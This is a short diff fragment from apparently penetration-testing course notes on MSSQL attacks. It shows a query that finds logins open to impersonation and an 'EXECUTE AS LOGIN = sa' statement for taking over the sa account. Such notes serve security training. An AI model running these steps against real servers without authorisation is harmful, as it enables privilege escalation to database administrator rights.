trike33/PEN-300-Code-Snippets/MSSQL Advanced Attacks.md

 ```
 SELECT distinct b.name FROM sys.server_permissions a INNER JOIN sys.server_principals b ON a.grantor_principal_id = b.principal_id WHERE a.permission_name = 'IMPERSONATE';
 ```
-To impersonate(assuming you can impersonate the sa user):
+To impersonate at a login level use this statement(assuming you can impersonate the sa user):

 ```
 EXECUTE AS LOGIN = sa;